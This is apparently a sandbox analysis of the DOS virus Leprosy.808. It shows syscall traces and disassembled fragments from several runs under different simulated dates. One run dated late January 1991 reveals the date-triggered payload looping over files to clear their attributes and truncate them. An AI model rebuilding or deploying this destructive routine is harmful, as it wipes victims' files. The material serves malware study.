Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.808.m

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:27:05.093237012Z 48 PC: 12b3f | Get DOS version
2018-12-17T22:27:05.094913532Z 44 PC: 12b47 | Get time
0x12b47: mov byte ptr [0x103], dl
0x12b4b: mov dx, 0x14e
0x12b4e: mov ah, 0x1a
0x12b50: int 0x21
0x12b52: mov ah, 0x19
0x12b54: int 0x21
0x12b56: mov dl, al
0x12b58: inc dl
0x12b5a: mov ah, 0x47
0x12b5c: mov si, 0x1ad
0x12b5f: int 0x21
0x12b61: mov dx, 0x14c
0x12b64: mov ah, 0x3b
0x12b66: int 0x21
0x12b68: mov cx, 0x13
0x12b6b: mov dx, 0x144
0x12b6e: mov ah, 0x4e
0x12b70: int 0x21
0x12b72: cmp ax, 0x12
0x12b75: jne 0x12b7a
2018-12-17T22:27:05.097245303Z 26 PC: 12b52 | Set disk transfer address
2018-12-17T22:27:05.098611304Z 25 PC: 12b56 | Get default drive
2018-12-17T22:27:05.10039602Z 71 PC: 12b61 | Get current directory
2018-12-17T22:27:05.103241916Z 59 PC: 12b68 | Change current directory
2018-12-17T22:27:05.106933323Z 78 PC: 12b72 | Find first file
2018-12-17T22:27:05.112507651Z 87 PC: 12c56 | Get or set file date and time
2018-12-17T22:27:05.114282178Z 67 PC: 12c62 | Get or set file attributes
2018-12-17T22:27:05.11587533Z 59 PC: 12c69 | Change current directory
2018-12-17T22:27:05.119576202Z 59 PC: 12c70 | Change current directory
2018-12-17T22:27:05.121440425Z 42 PC: 12c74 | Get date
0x12c74: cmp cx, 0x7c7
0x12c78: jb 0x12caa
0x12c7a: cmp dl, 0x19
0x12c7d: jb 0x12caa
0x12c7f: cmp al, 5
0x12c81: jne 0x12caa
0x12c83: mov dx, 0x14e
0x12c86: mov ah, 0x1a
0x12c88: int 0x21
0x12c8a: mov ah, 0x4e
0x12c8c: mov cx, 7
0x12c8f: mov dx, 0x140
0x12c92: int 0x21
0x12c94: jb 0x12caa
0x12c96: mov ax, 0x4301
0x12c99: xor cx, cx
0x12c9b: int 0x21
0x12c9d: mov dx, 0x16c
0x12ca0: mov ah, 0x3c
0x12ca2: int 0x21
2018-12-17T22:27:05.123471732Z 76 PC: 12caf | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4805,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:55.965941593Z 48 PC: 12b3f | Get DOS version
2018-12-25T11:52:55.96779121Z 44 PC: 12b47 | Get time
0x12b47: mov byte ptr [0x103], dl
0x12b4b: mov dx, 0x14e
0x12b4e: mov ah, 0x1a
0x12b50: int 0x21
0x12b52: mov ah, 0x19
0x12b54: int 0x21
0x12b56: mov dl, al
0x12b58: inc dl
0x12b5a: mov ah, 0x47
0x12b5c: mov si, 0x1ad
0x12b5f: int 0x21
0x12b61: mov dx, 0x14c
0x12b64: mov ah, 0x3b
0x12b66: int 0x21
0x12b68: mov cx, 0x13
0x12b6b: mov dx, 0x144
0x12b6e: mov ah, 0x4e
0x12b70: int 0x21
0x12b72: cmp ax, 0x12
0x12b75: jne 0x12b7a
2018-12-25T11:52:55.969759733Z 26 PC: 12b52 | Set disk transfer address
2018-12-25T11:52:55.970717811Z 25 PC: 12b56 | Get default drive
2018-12-25T11:52:55.972404439Z 71 PC: 12b61 | Get current directory
2018-12-25T11:52:55.97515665Z 59 PC: 12b68 | Change current directory
2018-12-25T11:52:55.978874153Z 78 PC: 12b72 | Find first file
2018-12-25T11:52:55.985359164Z 87 PC: 12c56 | Get or set file date and time
2018-12-25T11:52:55.986840948Z 67 PC: 12c62 | Get or set file attributes
2018-12-25T11:52:55.988525511Z 59 PC: 12c69 | Change current directory
2018-12-25T11:52:55.993147026Z 59 PC: 12c70 | Change current directory
2018-12-25T11:52:55.994898385Z 42 PC: 12c74 | Get date
0x12c74: cmp cx, 0x7c7
0x12c78: jb 0x12caa
0x12c7a: cmp dl, 0x19
0x12c7d: jb 0x12caa
0x12c7f: cmp al, 5
0x12c81: jne 0x12caa
0x12c83: mov dx, 0x14e
0x12c86: mov ah, 0x1a
0x12c88: int 0x21
0x12c8a: mov ah, 0x4e
0x12c8c: mov cx, 7
0x12c8f: mov dx, 0x140
0x12c92: int 0x21
0x12c94: jb 0x12caa
0x12c96: mov ax, 0x4301
0x12c99: xor cx, cx
0x12c9b: int 0x21
0x12c9d: mov dx, 0x16c
0x12ca0: mov ah, 0x3c
0x12ca2: int 0x21
2018-12-25T11:52:55.99694079Z 76 PC: 12caf | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4805,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:56.150555873Z 48 PC: 12b3f | Get DOS version
2018-12-25T11:52:56.1526974Z 44 PC: 12b47 | Get time
0x12b47: mov byte ptr [0x103], dl
0x12b4b: mov dx, 0x14e
0x12b4e: mov ah, 0x1a
0x12b50: int 0x21
0x12b52: mov ah, 0x19
0x12b54: int 0x21
0x12b56: mov dl, al
0x12b58: inc dl
0x12b5a: mov ah, 0x47
0x12b5c: mov si, 0x1ad
0x12b5f: int 0x21
0x12b61: mov dx, 0x14c
0x12b64: mov ah, 0x3b
0x12b66: int 0x21
0x12b68: mov cx, 0x13
0x12b6b: mov dx, 0x144
0x12b6e: mov ah, 0x4e
0x12b70: int 0x21
0x12b72: cmp ax, 0x12
0x12b75: jne 0x12b7a
2018-12-25T11:52:56.155924519Z 26 PC: 12b52 | Set disk transfer address
2018-12-25T11:52:56.1571652Z 25 PC: 12b56 | Get default drive
2018-12-25T11:52:56.168019565Z 71 PC: 12b61 | Get current directory
2018-12-25T11:52:56.171196344Z 59 PC: 12b68 | Change current directory
2018-12-25T11:52:56.176647698Z 78 PC: 12b72 | Find first file
2018-12-25T11:52:56.189247124Z 87 PC: 12c56 | Get or set file date and time
2018-12-25T11:52:56.19156469Z 67 PC: 12c62 | Get or set file attributes
2018-12-25T11:52:56.193721683Z 59 PC: 12c69 | Change current directory
2018-12-25T11:52:56.199797811Z 59 PC: 12c70 | Change current directory
2018-12-25T11:52:56.202886287Z 42 PC: 12c74 | Get date
0x12c74: cmp cx, 0x7c7
0x12c78: jb 0x12caa
0x12c7a: cmp dl, 0x19
0x12c7d: jb 0x12caa
0x12c7f: cmp al, 5
0x12c81: jne 0x12caa
0x12c83: mov dx, 0x14e
0x12c86: mov ah, 0x1a
0x12c88: int 0x21
0x12c8a: mov ah, 0x4e
0x12c8c: mov cx, 7
0x12c8f: mov dx, 0x140
0x12c92: int 0x21
0x12c94: jb 0x12caa
0x12c96: mov ax, 0x4301
0x12c99: xor cx, cx
0x12c9b: int 0x21
0x12c9d: mov dx, 0x16c
0x12ca0: mov ah, 0x3c
0x12ca2: int 0x21
2018-12-25T11:52:56.206053921Z 76 PC: 12caf | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":25,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4805,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:56.397779196Z 48 PC: 12b3f | Get DOS version
2018-12-25T11:52:56.399726487Z 44 PC: 12b47 | Get time
0x12b47: mov byte ptr [0x103], dl
0x12b4b: mov dx, 0x14e
0x12b4e: mov ah, 0x1a
0x12b50: int 0x21
0x12b52: mov ah, 0x19
0x12b54: int 0x21
0x12b56: mov dl, al
0x12b58: inc dl
0x12b5a: mov ah, 0x47
0x12b5c: mov si, 0x1ad
0x12b5f: int 0x21
0x12b61: mov dx, 0x14c
0x12b64: mov ah, 0x3b
0x12b66: int 0x21
0x12b68: mov cx, 0x13
0x12b6b: mov dx, 0x144
0x12b6e: mov ah, 0x4e
0x12b70: int 0x21
0x12b72: cmp ax, 0x12
0x12b75: jne 0x12b7a
2018-12-25T11:52:56.40365665Z 26 PC: 12b52 | Set disk transfer address
2018-12-25T11:52:56.405911856Z 25 PC: 12b56 | Get default drive
2018-12-25T11:52:56.409307802Z 71 PC: 12b61 | Get current directory
2018-12-25T11:52:56.412414963Z 59 PC: 12b68 | Change current directory
2018-12-25T11:52:56.417434646Z 78 PC: 12b72 | Find first file
2018-12-25T11:52:56.431041204Z 87 PC: 12c56 | Get or set file date and time
2018-12-25T11:52:56.434214899Z 67 PC: 12c62 | Get or set file attributes
2018-12-25T11:52:56.436472406Z 59 PC: 12c69 | Change current directory
2018-12-25T11:52:56.441114524Z 59 PC: 12c70 | Change current directory
2018-12-25T11:52:56.444345402Z 42 PC: 12c74 | Get date
0x12c74: cmp cx, 0x7c7
0x12c78: jb 0x12caa
0x12c7a: cmp dl, 0x19
0x12c7d: jb 0x12caa
0x12c7f: cmp al, 5
0x12c81: jne 0x12caa
0x12c83: mov dx, 0x14e
0x12c86: mov ah, 0x1a
0x12c88: int 0x21
0x12c8a: mov ah, 0x4e
0x12c8c: mov cx, 7
0x12c8f: mov dx, 0x140
0x12c92: int 0x21
0x12c94: jb 0x12caa
0x12c96: mov ax, 0x4301
0x12c99: xor cx, cx
0x12c9b: int 0x21
0x12c9d: mov dx, 0x16c
0x12ca0: mov ah, 0x3c
0x12ca2: int 0x21
2018-12-25T11:52:56.446706922Z 26 PC: 12c8a | Set disk transfer address
2018-12-25T11:52:56.447897483Z 78 PC: 12c94 | Find first file
2018-12-25T11:52:56.470282978Z 67 PC: 12c9d | Get or set file attributes
2018-12-25T11:52:56.475279499Z 60 PC: 12ca4 | Create or truncate file
2018-12-25T11:52:56.504716235Z 79 PC: 12c94 | Find next file (See above)
2018-12-25T11:52:56.508563597Z 67 PC: 12c9d | Get or set file attributes (See above)
2018-12-25T11:52:56.528518771Z 60 PC: 12ca4 | Create or truncate file (See above)
2018-12-25T11:52:56.550946031Z 79 PC: 12c94 | Find next file (See above)
2018-12-25T11:52:56.554380284Z 67 PC: 12c9d | Get or set file attributes (See above)
2018-12-25T11:52:56.565392449Z 60 PC: 12ca4 | Create or truncate file (See above)
2018-12-25T11:52:56.583102871Z 79 PC: 12c94 | Find next file (See above)
2018-12-25T11:52:56.587428633Z 67 PC: 12c9d | Get or set file attributes (See above)
2018-12-25T11:52:56.600494425Z 60 PC: 12ca4 | Create or truncate file (See above)
2018-12-25T11:52:56.615060187Z 79 PC: 12c94 | Find next file (See above)
2018-12-25T11:52:56.618801578Z 67 PC: 12c9d | Get or set file attributes (See above)
2018-12-25T11:52:56.630941199Z 60 PC: 12ca4 | Create or truncate file (See above)
2018-12-25T11:52:56.645714512Z 79 PC: 12c94 | Find next file (See above)
2018-12-25T11:52:56.651086771Z 67 PC: 12c9d | Get or set file attributes (See above)
2018-12-25T11:52:56.663651362Z 60 PC: 12ca4 | Create or truncate file (See above)
2018-12-25T11:52:56.677523599Z 79 PC: 12c94 | Find next file (See above)
2018-12-25T11:52:56.680810669Z 67 PC: 12c9d | Get or set file attributes (See above)
2018-12-25T11:52:56.693393121Z 60 PC: 12ca4 | Create or truncate file (See above)
2018-12-25T11:52:56.706996649Z 79 PC: 12c94 | Find next file (See above)
2018-12-25T11:52:56.709980279Z 67 PC: 12c9d | Get or set file attributes (See above)
2018-12-25T11:52:56.721595766Z 60 PC: 12ca4 | Create or truncate file (See above)
2018-12-25T11:52:56.735362103Z 79 PC: 12c94 | Find next file (See above)
2018-12-25T11:52:56.738569993Z 67 PC: 12c9d | Get or set file attributes (See above)
2018-12-25T11:52:56.750101388Z 60 PC: 12ca4 | Create or truncate file (See above)
2018-12-25T11:52:56.764344907Z 79 PC: 12c94 | Find next file (See above)
2018-12-25T11:52:56.767640138Z 76 PC: 12caf | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":26,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4805,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:56.402242046Z 48 PC: 12b3f | Get DOS version
2018-12-25T11:52:56.404504508Z 44 PC: 12b47 | Get time
0x12b47: mov byte ptr [0x103], dl
0x12b4b: mov dx, 0x14e
0x12b4e: mov ah, 0x1a
0x12b50: int 0x21
0x12b52: mov ah, 0x19
0x12b54: int 0x21
0x12b56: mov dl, al
0x12b58: inc dl
0x12b5a: mov ah, 0x47
0x12b5c: mov si, 0x1ad
0x12b5f: int 0x21
0x12b61: mov dx, 0x14c
0x12b64: mov ah, 0x3b
0x12b66: int 0x21
0x12b68: mov cx, 0x13
0x12b6b: mov dx, 0x144
0x12b6e: mov ah, 0x4e
0x12b70: int 0x21
0x12b72: cmp ax, 0x12
0x12b75: jne 0x12b7a
2018-12-25T11:52:56.407470851Z 26 PC: 12b52 | Set disk transfer address
2018-12-25T11:52:56.408845343Z 25 PC: 12b56 | Get default drive
2018-12-25T11:52:56.411202328Z 71 PC: 12b61 | Get current directory
2018-12-25T11:52:56.415513244Z 59 PC: 12b68 | Change current directory
2018-12-25T11:52:56.420276059Z 78 PC: 12b72 | Find first file
2018-12-25T11:52:56.424735831Z 87 PC: 12c56 | Get or set file date and time
2018-12-25T11:52:56.426374028Z 67 PC: 12c62 | Get or set file attributes
2018-12-25T11:52:56.427814671Z 59 PC: 12c69 | Change current directory
2018-12-25T11:52:56.430549394Z 59 PC: 12c70 | Change current directory
2018-12-25T11:52:56.440451384Z 42 PC: 12c74 | Get date
0x12c74: cmp cx, 0x7c7
0x12c78: jb 0x12caa
0x12c7a: cmp dl, 0x19
0x12c7d: jb 0x12caa
0x12c7f: cmp al, 5
0x12c81: jne 0x12caa
0x12c83: mov dx, 0x14e
0x12c86: mov ah, 0x1a
0x12c88: int 0x21
0x12c8a: mov ah, 0x4e
0x12c8c: mov cx, 7
0x12c8f: mov dx, 0x140
0x12c92: int 0x21
0x12c94: jb 0x12caa
0x12c96: mov ax, 0x4301
0x12c99: xor cx, cx
0x12c9b: int 0x21
0x12c9d: mov dx, 0x16c
0x12ca0: mov ah, 0x3c
0x12ca2: int 0x21
2018-12-25T11:52:56.442245424Z 76 PC: 12caf | Terminate with return code (Return code = '0')